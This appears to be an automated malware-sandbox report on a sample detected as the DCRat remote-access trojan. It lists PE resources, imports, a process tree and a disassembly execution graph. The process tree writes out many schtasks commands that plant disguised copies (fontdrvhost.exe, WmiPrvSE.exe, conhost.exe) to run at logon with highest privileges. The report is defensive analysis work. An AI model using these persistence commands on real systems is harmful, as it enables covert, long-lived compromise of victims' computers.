              RT_ICON0x689100x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/mEnglishUnited States0.3479253112033195
              RT_ICON0x6aeb80x3d71PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9809269502193401
              RT_DIALOG0x6f5880x286dataEnglishUnited States0.5092879256965944
              RT_DIALOG0x6f3580x13adataEnglishUnited States0.60828025477707
              RT_DIALOG0x6f4980xecdataEnglishUnited States0.6991525423728814
              RT_DIALOG0x6f2280x12edataEnglishUnited States0.5927152317880795
              RT_DIALOG0x6eef00x338dataEnglishUnited States0.45145631067961167
              RT_DIALOG0x6ec980x252dataEnglishUnited States0.5757575757575758
              RT_STRING0x6ff680x1e2dataEnglishUnited States0.3900414937759336
              RT_STRING0x701500x1ccdataEnglishUnited States0.4282608695652174
              RT_STRING0x703200x1b8dataEnglishUnited States0.45681818181818185
              RT_STRING0x704d80x146dataEnglishUnited States0.5153374233128835
              RT_STRING0x706200x446dataEnglishUnited States0.340036563071298
              RT_STRING0x70a680x166dataEnglishUnited States0.49162011173184356
              RT_STRING0x70bd00x152dataEnglishUnited States0.5059171597633136
              RT_STRING0x70d280x10adataEnglishUnited States0.49624060150375937
              RT_STRING0x70e380xbcdataEnglishUnited States0.6329787234042553
              RT_STRING0x70ef80xd6dataEnglishUnited States0.5747663551401869
              RT_GROUP_ICON0x6ec300x68dataEnglishUnited States0.7019230769230769
              RT_MANIFEST0x6f8100x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3957333333333333
              DLLImport
              KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer
              gdiplus.dllGdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc
              Language of compilation systemCountry where language is spokenMap
              EnglishUnited States
              No network behavior found

              Click to jump to process

              Click to jump to process

              Click to dive into process behavior distribution

              Click to jump to process

              Target ID:0
              Start time:23:52:05
              Start date:24/11/2024
              Path:C:\Users\user\Desktop\c62q1qZ8kX.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\Desktop\c62q1qZ8kX.exe"
              Imagebase:0x1d0000
              File size:1'164'947 bytes
              MD5 hash:11DA048860021B6C22E171032E48B023
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:low
              Has exited:true

              Target ID:1
              Start time:23:52:05
              Start date:24/11/2024
              Path:C:\Windows\SysWOW64\wscript.exe
              Wow64 process (32bit):true
              Commandline:"C:\Windows\System32\WScript.exe" "C:\blockrefSessionBrokerDll\5sVJrvWE.vbe"
              Imagebase:0xd80000
              File size:147'456 bytes
              MD5 hash:FF00E0480075B095948000BDC66E81F0
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:2
              Start time:23:52:13
              Start date:24/11/2024
              Path:C:\Windows\SysWOW64\cmd.exe
              Wow64 process (32bit):true
              Commandline:C:\Windows\system32\cmd.exe /c ""C:\blockrefSessionBrokerDll\jNiINMcACfpGfudqTH4IxZpVWTbF.bat" "
              Imagebase:0x240000
              File size:236'544 bytes
              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:3
              Start time:23:52:13
              Start date:24/11/2024
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff7699e0000
              File size:862'208 bytes
              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:4
              Start time:23:52:14
              Start date:24/11/2024
              Path:C:\blockrefSessionBrokerDll\chainMonitor.exe
              Wow64 process (32bit):false
              Commandline:"C:\blockrefSessionBrokerDll\chainMonitor.exe"
              Imagebase:0xd30000
              File size:847'872 bytes
              MD5 hash:F6B809FA6BD0E72435FAB78E9744CCD7
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000002.1801910999.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000002.1801910999.0000000003371000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              Antivirus matches:
              • Detection: 100%, Avira
              • Detection: 100%, Joe Sandbox ML
              • Detection: 79%, ReversingLabs
              Reputation:low
              Has exited:true

              Target ID:5
              Start time:23:52:15
              Start date:24/11/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "mmeUVmNHPOdstm" /sc MINUTE /mo 9 /tr "'C:\Users\Default\mmeUVmNHPOdst.exe'" /f
              Imagebase:0x7ff76f990000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:6
              Start time:23:52:15
              Start date:24/11/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "mmeUVmNHPOdst" /sc ONLOGON /tr "'C:\Users\Default\mmeUVmNHPOdst.exe'" /rl HIGHEST /f
              Imagebase:0x7ff76f990000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:7
              Start time:23:52:15
              Start date:24/11/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "mmeUVmNHPOdstm" /sc MINUTE /mo 9 /tr "'C:\Users\Default\mmeUVmNHPOdst.exe'" /rl HIGHEST /f
              Imagebase:0x7ff76f990000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:8
              Start time:23:52:15
              Start date:24/11/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "mmeUVmNHPOdstm" /sc MINUTE /mo 5 /tr "'C:\Recovery\mmeUVmNHPOdst.exe'" /f
              Imagebase:0x7ff76f990000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:9
              Start time:23:52:15
              Start date:24/11/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "mmeUVmNHPOdst" /sc ONLOGON /tr "'C:\Recovery\mmeUVmNHPOdst.exe'" /rl HIGHEST /f
              Imagebase:0x7ff76f990000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:10
              Start time:23:52:15
              Start date:24/11/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "mmeUVmNHPOdstm" /sc MINUTE /mo 11 /tr "'C:\Recovery\mmeUVmNHPOdst.exe'" /rl HIGHEST /f
              Imagebase:0x7ff76f990000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:11
              Start time:23:52:15
              Start date:24/11/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 13 /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exe'" /f
              Imagebase:0x7ff76f990000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Has exited:true

              Target ID:12
              Start time:23:52:15
              Start date:24/11/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exe'" /rl HIGHEST /f
              Imagebase:0x7ff76f990000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Has exited:true

              Target ID:13
              Start time:23:52:15
              Start date:24/11/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 5 /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exe'" /rl HIGHEST /f
              Imagebase:0x7ff76f990000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Has exited:true

              Target ID:14
              Start time:23:52:16
              Start date:24/11/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "mmeUVmNHPOdstm" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Defender\en-US\mmeUVmNHPOdst.exe'" /f
              Imagebase:0x7ff76f990000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Has exited:true

              Target ID:15
              Start time:23:52:16
              Start date:24/11/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "mmeUVmNHPOdst" /sc ONLOGON /tr "'C:\Program Files\Windows Defender\en-US\mmeUVmNHPOdst.exe'" /rl HIGHEST /f
              Imagebase:0x7ff76f990000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Has exited:true

              Target ID:16
              Start time:23:52:16
              Start date:24/11/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "mmeUVmNHPOdstm" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Defender\en-US\mmeUVmNHPOdst.exe'" /rl HIGHEST /f
              Imagebase:0x7ff76f990000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Has exited:true

              Target ID:17
              Start time:23:52:16
              Start date:24/11/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows NT\Accessories\en-GB\conhost.exe'" /f
              Imagebase:0x7ff76f990000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Has exited:true

              Target ID:18
              Start time:23:52:16
              Start date:24/11/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files\Windows NT\Accessories\en-GB\conhost.exe'" /rl HIGHEST /f
              Imagebase:0x7ff76f990000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Has exited:true

              Target ID:19
              Start time:23:52:16
              Start date:24/11/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows NT\Accessories\en-GB\conhost.exe'" /rl HIGHEST /f
              Imagebase:0x7ff76f990000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Has exited:true

              Target ID:20
              Start time:23:52:16
              Start date:24/11/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 6 /tr "'C:\Program Files\7-Zip\Lang\TextInputHost.exe'" /f
              Imagebase:0x7ff76f990000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Has exited:true

              Target ID:21
              Start time:23:52:16
              Start date:24/11/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "TextInputHost" /sc ONLOGON /tr "'C:\Program Files\7-Zip\Lang\TextInputHost.exe'" /rl HIGHEST /f
              Imagebase:0x7ff76f990000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Has exited:true

              Target ID:22
              Start time:23:52:16
              Start date:24/11/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 11 /tr "'C:\Program Files\7-Zip\Lang\TextInputHost.exe'" /rl HIGHEST /f
              Imagebase:0x7ff76f990000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Has exited:true

              Target ID:24
              Start time:23:52:16
              Start date:24/11/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\java\jre-1.8\lib\applet\WmiPrvSE.exe'" /f
              Imagebase:0x7ff76f990000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Has exited:true

              Target ID:25
              Start time:23:52:16
              Start date:24/11/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files (x86)\java\jre-1.8\lib\applet\WmiPrvSE.exe'" /rl HIGHEST /f
              Imagebase:0x7ff76f990000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Has exited:true

              Target ID:26
              Start time:23:52:16
              Start date:24/11/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\java\jre-1.8\lib\applet\WmiPrvSE.exe'" /rl HIGHEST /f
              Imagebase:0x7ff70f330000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Has exited:true

              Target ID:28
              Start time:23:52:16
              Start date:24/11/2024
              Path:C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exe
              Wow64 process (32bit):false
              Commandline:"C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exe"
              Imagebase:0xba0000
              File size:847'872 bytes
              MD5 hash:F6B809FA6BD0E72435FAB78E9744CCD7
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001C.00000002.1879455048.0000000002E31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              Antivirus matches:
              • Detection: 100%, Avira
              • Detection: 100%, Joe Sandbox ML
              • Detection: 79%, ReversingLabs
              • Detection: 76%, Virustotal, Browse
              Has exited:true

              Target ID:29
              Start time:23:52:16
              Start date:24/11/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "mmeUVmNHPOdstm" /sc MINUTE /mo 6 /tr "'C:\Users\Default User\AppData\Local\Application Data\History\mmeUVmNHPOdst.exe'" /f
              Imagebase:0x7ff76f990000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Has exited:true

              Target ID:30
              Start time:23:52:16
              Start date:24/11/2024
              Path:C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exe
              Wow64 process (32bit):false
              Commandline:"C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exe"
              Imagebase:0xe30000
              File size:847'872 bytes
              MD5 hash:F6B809FA6BD0E72435FAB78E9744CCD7
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001E.00000002.1884137133.0000000003231000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              Has exited:true

              Target ID:31
              Start time:23:52:16
              Start date:24/11/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "mmeUVmNHPOdst" /sc ONLOGON /tr "'C:\Users\Default User\AppData\Local\Application Data\History\mmeUVmNHPOdst.exe'" /rl HIGHEST /f
              Imagebase:0x7ff76f990000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Has exited:true

              Target ID:32
              Start time:23:52:16
              Start date:24/11/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "mmeUVmNHPOdstm" /sc MINUTE /mo 9 /tr "'C:\Users\Default User\AppData\Local\Application Data\History\mmeUVmNHPOdst.exe'" /rl HIGHEST /f
              Imagebase:0x7ff76f990000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Has exited:true

              Target ID:33
              Start time:23:52:16
              Start date:24/11/2024
              Path:C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exe
              Wow64 process (32bit):false
              Commandline:"C:\Users\Default User\AppData\Local\Application Data\History\mmeUVmNHPOdst.exe"
              Imagebase:0xfa0000
              File size:847'872 bytes
              MD5 hash:F6B809FA6BD0E72435FAB78E9744CCD7
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000021.00000002.1884278845.00000000032F8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000021.00000002.1884278845.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              Antivirus matches:
              • Detection: 79%, ReversingLabs
              Has exited:true

              Target ID:34
              Start time:23:52:16
              Start date:24/11/2024
              Path:C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exe
              Wow64 process (32bit):false
              Commandline:"C:\Users\Default User\AppData\Local\Application Data\History\mmeUVmNHPOdst.exe"
              Imagebase:0xe50000
              File size:847'872 bytes
              MD5 hash:F6B809FA6BD0E72435FAB78E9744CCD7
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000022.00000002.1884618745.00000000032F2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000022.00000002.1884618745.00000000032B5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000022.00000002.1884618745.00000000032E9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              Has exited:true

              Target ID:36
              Start time:23:52:16
              Start date:24/11/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\microsoft onedrive\setup\logs\Idle.exe'" /f
              Imagebase:0x7ff76f990000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Has exited:true

              Target ID:37
              Start time:23:52:16
              Start date:24/11/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft onedrive\setup\logs\Idle.exe'" /rl HIGHEST /f
              Imagebase:0x7ff76f990000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Has exited:true

              Target ID:39
              Start time:23:52:16
              Start date:24/11/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\microsoft onedrive\setup\logs\Idle.exe'" /rl HIGHEST /f
              Imagebase:0x7ff76f990000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Has exited:true

              Target ID:40
              Start time:23:52:17
              Start date:24/11/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "mmeUVmNHPOdstm" /sc MINUTE /mo 13 /tr "'C:\Users\Public\Pictures\mmeUVmNHPOdst.exe'" /f
              Imagebase:0x7ff76f990000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Has exited:true

              Target ID:41
              Start time:23:52:17
              Start date:24/11/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "mmeUVmNHPOdst" /sc ONLOGON /tr "'C:\Users\Public\Pictures\mmeUVmNHPOdst.exe'" /rl HIGHEST /f
              Imagebase:0x7ff76f990000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Has exited:true

              Reset < >

                Execution Graph

                Execution Coverage:9.7%
                Dynamic/Decrypted Code Coverage:0%
                Signature Coverage:9.3%
                Total number of Nodes:1498
                Total number of Limit Nodes:26
                execution_graph 22883 1edc1f 22884 1edbcd 22883->22884 22886 1edf59 22884->22886 22914 1edc67 22886->22914 22888 1edf73 22889 1edfd0 22888->22889 22903 1edff4 22888->22903 22890 1eded7 DloadReleaseSectionWriteAccess 11 API calls 22889->22890 22891 1edfdb RaiseException 22890->22891 22892 1ee1c9 22891->22892 22933 1eec4a 22892->22933 22893 1ee06c LoadLibraryExA 22895 1ee07f GetLastError 22893->22895 22896 1ee0cd 22893->22896 22899 1ee0a8 22895->22899 22900 1ee092 22895->22900 22898 1ee0d8 FreeLibrary 22896->22898 22902 1ee0df 22896->22902 22897 1ee1d8 22897->22884 22898->22902 22905 1eded7 DloadReleaseSectionWriteAccess 11 API calls 22899->22905 22900->22896 22900->22899 22901 1ee13d GetProcAddress 22904 1ee14d GetLastError 22901->22904 22909 1ee19b 22901->22909 22902->22901 22902->22909 22903->22893 22903->22896 22903->22902 22903->22909 22907 1ee160 22904->22907 22906 1ee0b3 RaiseException 22905->22906 22906->22892 22907->22909 22910 1eded7 DloadReleaseSectionWriteAccess 11 API calls 22907->22910 22925 1eded7 22909->22925 22911 1ee181 RaiseException 22910->22911 22912 1edc67 ___delayLoadHelper2@8 11 API calls 22911->22912 22913 1ee198 22912->22913 22913->22909 22915 1edc99 22914->22915 22916 1edc73 22914->22916 22915->22888 22940 1edd15 22916->22940 22919 1edc94 22950 1edc9a 22919->22950 22922 1eec4a ___delayLoadHelper2@8 5 API calls 22923 1edf55 22922->22923 22923->22888 22924 1edf24 22924->22922 22926 1edf0b 22925->22926 22927 1edee9 22925->22927 22926->22892 22928 1edd15 DloadLock 8 API calls 22927->22928 22929 1edeee 22928->22929 22930 1edf06 22929->22930 22931 1ede67 DloadProtectSection 3 API calls 22929->22931 22959 1edf0f 8 API calls 2 library calls 22930->22959 22931->22930 22934 1eec55 IsProcessorFeaturePresent 22933->22934 22935 1eec53 22933->22935 22937 1ef267 22934->22937 22935->22897 22960 1ef22b SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 22937->22960 22939 1ef34a 22939->22897 22941 1edc9a DloadLock 3 API calls 22940->22941 22942 1edd2a 22941->22942 22943 1eec4a ___delayLoadHelper2@8 5 API calls 22942->22943 22944 1edc78 22943->22944 22944->22919 22945 1ede67 22944->22945 22947 1ede7c DloadObtainSection 22945->22947 22946 1ede82 22946->22919 22947->22946 22948 1edeb7 VirtualProtect 22947->22948 22958 1edd72 VirtualQuery GetSystemInfo 22947->22958 22948->22946 22951 1edcab 22950->22951 22952 1edca7 22950->22952 22953 1edcaf 22951->22953 22954 1edcb3 GetModuleHandleW 22951->22954 22952->22924 22953->22924 22955 1edcc9 GetProcAddress 22954->22955 22957 1edcc5 22954->22957 22956 1edcd9 GetProcAddress 22955->22956 22955->22957 22956->22957 22957->22924 22958->22948 22959->22926 22960->22939 24862 1ebe49 108 API calls 4 library calls 24864 1d6110 80 API calls 24865 1fb710 GetProcessHeap 22968 1ec40e 22969 1ec4c7 22968->22969 22977 1ec42c _wcschr 22968->22977 22970 1ec4e5 22969->22970 22981 1ebe49 _wcsrchr 22969->22981 23023 1ece22 22969->23023 22973 1ece22 18 API calls 22970->22973 22970->22981 22973->22981 22974 1eca8d 22976 1e17ac CompareStringW 22976->22977 22977->22969 22977->22976 22978 1ec11d SetWindowTextW 22978->22981 22981->22974 